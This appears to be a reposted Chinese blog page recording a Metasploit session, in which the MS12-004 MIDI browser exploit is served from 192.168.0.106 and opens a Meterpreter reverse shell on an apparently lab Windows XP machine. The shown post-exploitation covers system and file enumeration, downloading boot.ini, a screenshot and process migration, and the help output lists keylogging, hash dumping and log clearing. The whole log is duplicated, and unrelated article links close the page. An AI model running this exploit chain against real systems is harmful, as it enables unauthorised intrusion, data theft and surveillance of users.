hack xp by ms12_004_midi for metasploit
来源:互联网 发布:网络诽谤罪立案标准 编辑:程序博客网 时间:2024/05/16 06:02
local ip : 192.168.0.106
不使用 ettercap -T -Q -i eth0 -M arp -P dns_spoof // //
下面是操作的一些常用的命令,已经运行后的结果:
root@bt:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 940 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > search ms12_004
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms12_004_midi 2012-01-10 00:00:00 UTC normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
msf > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > set SRVHOST 192.168.0.106
SRVHOST => 192.168.0.106
msf exploit(ms12_004_midi) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms12_004_midi) > set URIPATH /
URIPATH => /
msf exploit(ms12_004_midi) > exploit -j (执行后值目标机器上执行http://192.168.0.106:80/) Exploit running as background job.
Started reverse handler on 192.168.0.106:4444 Using URL: http://192.168.0.106:80/ Server started.
msf exploit(ms12_004_midi) > 192.168.0.116 ms12_004_midi - Sending HTML 192.168.0.116 ms12_004_midi - Sending midi file 192.168.0.116 ms12_004_midi - Sending midi file Sending stage (764928 bytes) to 192.168.0.116 Meterpreter session 1 opened (192.168.0.106:4444 -> 192.168.0.116:1250) at 2012-09-04 03:05:49 -0400 Session ID 1 (192.168.0.106:4444 -> 192.168.0.116:1250) processing InitialAutoRunScript 'migrate -f' Current server process: iexplore.exe (1000) Spawning notepad.exe process to migrate to
[+] Migrating to 1904
msf exploit(ms12_004_midi) > session[+] Successfully migrated to process
sesssion
[-] Unknown command: sesssesssion.
msf exploit(ms12_004_midi) > session
[-] Unknown command: session.
msf exploit(ms12_004_midi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CAP-BC726022006\Administrator @ CAP-BC726022006 192.168.0.106:4444 -> 192.168.0.116:1250 (192.168.0.116)
msf exploit(ms12_004_midi) > sessions -i 1 Starting interaction with 1...
meterpreter > sysinfo
Computer : CAP-BC726022006
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - pencS��R
z�_�W�z�S
Hardware MAC : 00:0c:29:37:8e:ff
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - ���ݰ��ƻ������Ͷ˿�
Hardware MAC : 00:0c:29:37:8e:ff
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
meterpreter > pwd
$U$C:\Documents and Settings\Administrator\-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f725cd7c0c3e6
meterpreter > cd \
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2012-07-03 04:54:50 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2012-07-03 04:54:50 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2012-07-10 21:58:27 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2012-07-03 04:54:50 -0400 IO.SYS
40777/rwxrwxrwx 0 dir 2012-08-07 22:01:44 -0400 MASM611
100444/r--r--r-- 0 fil 2012-07-03 04:54:50 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2012-09-03 21:40:11 -0400 Program Files
40777/rwxrwxrwx 0 dir 2012-08-01 21:45:51 -0400 RECYCLER
40777/rwxrwxrwx 0 dir 2012-07-03 04:59:46 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2012-09-02 23:08:35 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2012-08-12 22:00:58 -0400 boot.ini
100444/r--r--r-- 322730 fil 2008-04-14 08:00:00 -0400 bootfont.bin
100666/rw-rw-rw- 29062 fil 2012-07-11 05:25:42 -0400 hacker.reg
100444/r--r--r-- 257728 fil 2008-04-14 08:00:00 -0400 ntldr
100666/rw-rw-rw- 805306368 fil 2012-09-04 02:29:41 -0400 pagefile.sys
40777/rwxrwxrwx 0 dir 2012-08-06 21:26:03 -0400 study
40777/rwxrwxrwx 0 dir 2012-09-03 22:42:53 -0400 tools
meterpreter > download boot.ini downloading: boot.ini -> boot.ini downloaded : boot.ini -> boot.ini
meterpreter > screenshot
Screenshot saved to: /root/lpDyTsaF.jpeg
meterpreter >
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > execute -f notepad.exe
Process 188 created.
meterpreter > info
Usage: info <module>
Prints information about a post-exploitation module
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0
164 1948 jusched.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Common Files\Java\Java Update\jusched.exe
172 1948 ctfmon.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\ctfmon.exe
188 1904 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
372 1948 taskmgr.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\taskmgr.exe
544 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
580 676 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
608 544 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
632 544 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
676 632 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
688 632 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
844 676 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
856 676 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
940 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1000 1948 iexplore.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Internet Explorer\iexplore.exe
1068 676 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1140 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1272 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1404 676 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1508 164 jucheck.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Common Files\Java\Java Update\jucheck.exe
1564 676 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1624 676 jqs.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Java\jre7\bin\jqs.exe
1732 780 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
1776 676 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1824 1068 wscntfy.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\wscntfy.exe
1904 1000 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
1948 900 explorer.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\Explorer.EXE
1968 1564 TPAutoConnect.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2000 1256 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
2020 1948 VMwareTray.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2032 1948 vmtoolsd.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
meterpreter > migrate 1948 Migrating to 1948... Migration completed successfully.
meterpreter > getpid
Current pid: 1948
Backgrounding session 1...
msf exploit(ms12_004_midi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CAP-BC726022006\Administrator @ CAP-BC726022006 192.168.0.106:4444 -> 192.168.0.116:1250 (192.168.0.116)
msf exploit(ms12_004_midi) > sessions -d 1 Detaching session 1
msf exploit(ms12_004_midi) > session
[-] Unknown command: session.
msf exploit(ms12_004_midi) >
不使用 ettercap -T -Q -i eth0 -M arp -P dns_spoof // //
下面是操作的一些常用的命令,已经运行后的结果:
root@bt:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 940 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > search ms12_004
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms12_004_midi 2012-01-10 00:00:00 UTC normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
msf > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > set SRVHOST 192.168.0.106
SRVHOST => 192.168.0.106
msf exploit(ms12_004_midi) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms12_004_midi) > set URIPATH /
URIPATH => /
msf exploit(ms12_004_midi) > exploit -j (执行后值目标机器上执行http://192.168.0.106:80/) Exploit running as background job.
Started reverse handler on 192.168.0.106:4444 Using URL: http://192.168.0.106:80/ Server started.
msf exploit(ms12_004_midi) > 192.168.0.116 ms12_004_midi - Sending HTML 192.168.0.116 ms12_004_midi - Sending midi file 192.168.0.116 ms12_004_midi - Sending midi file Sending stage (764928 bytes) to 192.168.0.116 Meterpreter session 1 opened (192.168.0.106:4444 -> 192.168.0.116:1250) at 2012-09-04 03:05:49 -0400 Session ID 1 (192.168.0.106:4444 -> 192.168.0.116:1250) processing InitialAutoRunScript 'migrate -f' Current server process: iexplore.exe (1000) Spawning notepad.exe process to migrate to
[+] Migrating to 1904
msf exploit(ms12_004_midi) > session[+] Successfully migrated to process
sesssion
[-] Unknown command: sesssesssion.
msf exploit(ms12_004_midi) > session
[-] Unknown command: session.
msf exploit(ms12_004_midi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CAP-BC726022006\Administrator @ CAP-BC726022006 192.168.0.106:4444 -> 192.168.0.116:1250 (192.168.0.116)
msf exploit(ms12_004_midi) > sessions -i 1 Starting interaction with 1...
meterpreter > sysinfo
Computer : CAP-BC726022006
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - pencS��R
z�_�W�z�S
Hardware MAC : 00:0c:29:37:8e:ff
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - ���ݰ��ƻ������Ͷ˿�
Hardware MAC : 00:0c:29:37:8e:ff
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
meterpreter > pwd
$U$C:\Documents and Settings\Administrator\-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f725cd7c0c3e6
meterpreter > cd \
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2012-07-03 04:54:50 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2012-07-03 04:54:50 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2012-07-10 21:58:27 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2012-07-03 04:54:50 -0400 IO.SYS
40777/rwxrwxrwx 0 dir 2012-08-07 22:01:44 -0400 MASM611
100444/r--r--r-- 0 fil 2012-07-03 04:54:50 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2012-09-03 21:40:11 -0400 Program Files
40777/rwxrwxrwx 0 dir 2012-08-01 21:45:51 -0400 RECYCLER
40777/rwxrwxrwx 0 dir 2012-07-03 04:59:46 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2012-09-02 23:08:35 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2012-08-12 22:00:58 -0400 boot.ini
100444/r--r--r-- 322730 fil 2008-04-14 08:00:00 -0400 bootfont.bin
100666/rw-rw-rw- 29062 fil 2012-07-11 05:25:42 -0400 hacker.reg
100444/r--r--r-- 257728 fil 2008-04-14 08:00:00 -0400 ntldr
100666/rw-rw-rw- 805306368 fil 2012-09-04 02:29:41 -0400 pagefile.sys
40777/rwxrwxrwx 0 dir 2012-08-06 21:26:03 -0400 study
40777/rwxrwxrwx 0 dir 2012-09-03 22:42:53 -0400 tools
meterpreter > download boot.ini downloading: boot.ini -> boot.ini downloaded : boot.ini -> boot.ini
meterpreter > screenshot
Screenshot saved to: /root/lpDyTsaF.jpeg
meterpreter >
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > execute -f notepad.exe
Process 188 created.
meterpreter > info
Usage: info <module>
Prints information about a post-exploitation module
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0
164 1948 jusched.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Common Files\Java\Java Update\jusched.exe
172 1948 ctfmon.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\ctfmon.exe
188 1904 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
372 1948 taskmgr.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\taskmgr.exe
544 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
580 676 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
608 544 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
632 544 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
676 632 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
688 632 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
844 676 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
856 676 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
940 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1000 1948 iexplore.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Internet Explorer\iexplore.exe
1068 676 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1140 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1272 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1404 676 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1508 164 jucheck.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Common Files\Java\Java Update\jucheck.exe
1564 676 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1624 676 jqs.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Java\jre7\bin\jqs.exe
1732 780 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
1776 676 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1824 1068 wscntfy.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\wscntfy.exe
1904 1000 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
1948 900 explorer.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\Explorer.EXE
1968 1564 TPAutoConnect.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2000 1256 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
2020 1948 VMwareTray.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2032 1948 vmtoolsd.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
meterpreter > migrate 1948 Migrating to 1948... Migration completed successfully.
meterpreter > getpid
Current pid: 1948
meterpreter >
meterpreter > background
msf exploit(ms12_004_midi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CAP-BC726022006\Administrator @ CAP-BC726022006 192.168.0.106:4444 -> 192.168.0.116:1250 (192.168.0.116)
msf exploit(ms12_004_midi) > sessions -d 1
msf exploit(ms12_004_midi) > session
[-] Unknown command: session.
msf exploit(ms12_004_midi) >
- hack xp by ms12_004_midi for metasploit
- Super Tweaks for Windows XP by Black Viper
- css hack for ie
- css hack for ie
- Metasploit Oracle TNSCMD SMBRelay Demo by Carnal0wnage
- Metasploit
- Metasploit
- Metasploit
- Metasploit - Tips for Evading Anti-Virus
- Metasploit加Nessus成功入侵xp经验分享
- Owning Dell DRAC for ONE AWESOME HACK!
- XP按钮 FOR .NET
- Vista Game for XP
- apache for xp 安装
- Vim for Windows XP
- HACK
- HACK
- hack
- linux 常用命令
- hdu1251 统计难题(字典树)
- tl 1.9.x 测试用例导入
- 常用java知识
- c# SQL数据库远程连接及配置方法
- hack xp by ms12_004_midi for metasploit
- 线程的同步
- TCP状态转换图
- 控制反转(IoC)容器
- 分层设计的好处
- python 计算两个带日期的时间差
- sqlserver数据库中设置id项为自动增长
- Maximum request length exceeded
- 【C++泛型编程】Typelists型别工具